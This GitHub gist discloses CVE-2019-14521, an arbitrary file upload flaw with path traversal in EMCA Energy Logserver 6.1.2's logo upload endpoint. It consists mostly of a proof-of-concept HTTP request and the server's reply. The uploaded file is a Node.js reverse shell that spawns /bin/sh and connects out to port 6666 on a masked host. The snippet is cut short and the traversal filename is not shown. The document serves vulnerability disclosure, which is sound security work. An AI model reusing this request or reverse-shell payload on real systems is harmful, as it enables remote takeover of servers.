Skip to content

Instantly share code, notes, and snippets.

Created August 5, 2019 05:38
Show Gist options
  • Save ahpaleus/effb46d4a9d9c2b9a452c98f64ddc2c7 to your computer and use it in GitHub Desktop.
Save ahpaleus/effb46d4a9d9c2b9a452c98f64ddc2c7 to your computer and use it in GitHub Desktop.
CVE-2019-14521 - Arbitrary File Upload
The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.
To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere.
Request to the server:
POST /api/admin/logoupload HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
kbn-version: 6.2.4
X-Csrf-Token: QSNZ7g3HUTZv1MniVh8bj4IaPQUL81Px
Content-Type: multipart/form-data; boundary=---------------------------653820859933555141363061488
Content-Length: 740
Connection: close
Cookie: sid-auth=Fe26.2**25296dc9fce823a993d01f0601a72154aa2ade42ea9004b8cc051d3961daf0a6*OpTLWQDkfk-6Fv4WTfzyCw*LM28Nb1W9gHPy4n9s5j-O4r9rNlHItji9PvhMxcBMMWz69Oi2rwKW5K21vwxAWlm4Q4n8aV9G7237zYLOb4HVA**3e5e132a726bac22877c5ea51d31c9c2d88b9eddd11e592ff0bcb13e0ddba8fd*wcNSqH9a462TDoXfH9DTugUIwoFQ7_G3lqpSCZRhJWk
Content-Disposition: form-data; name="file"; filename="rshell.js"
Content-Type: text/html
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6666, "XXXXXXXXXXX", function(){
return /a/;
Content-Disposition: form-data; name="filename"
Response from the server:
HTTP/1.1 200 OK
kbn-name: kibana
kbn-version: 6.2.4
content-type: text/html; charset=utf-8
cache-control: no-cache
vary: accept-encoding
Connection: close
Content-Length: 21
Successfully uploaded
Maciej Domanski / team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment